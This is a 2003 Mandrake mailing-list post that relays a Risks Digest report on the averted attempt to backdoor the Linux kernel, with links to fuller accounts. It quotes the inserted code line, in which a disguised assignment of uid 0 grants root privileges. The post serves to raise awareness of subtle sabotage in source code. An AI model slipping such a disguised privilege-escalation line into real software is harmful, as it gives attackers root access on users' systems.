Although this is not Mandrake related, I feel its worth posting the link to 
the story.  This was posted in the Risks Digest:

On 5 Nov 2003, an attempt to insert a very cleverly crafted backdoor into
Linux was averted.  This is a really good example of the subtle kinds of
hacks a source code examiner must be waiting to catch if we want genuinely
secure voting systems under the current model of proprietary DRE systems
with a closed-door source code examination.

Someone broke into a server at kernel.kbits.net and inserted the following
code into the Linux kernel:

        if ((options == (__WCLONE|__WALL)) && (current->uid = 0))

                        retval = -EINVAL;
For the complete story of this attack on Linux, including the actual E-mail
exchange documenting the discovery of the attack, see:

    http://kerneltrap.org/node/view/1584
    Linux: Kernel "Back Door" Attempt

This attack has only made the mainstream media in one place, so far:

    http://www.smh.com.au/articles/2003/11/07/1068013371170.html
    Bid to backdoor Linux kernel detected - smh.com.au

-- 
  Regards
  Chris
  A 100% Microsoft free computer
  Registered Linux User 283774 http://counter.li.org
  9:16pm  up 4 days, 11:22,  3 users,  load average: 0.08, 0.05, 0.01


Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com

Reply via email to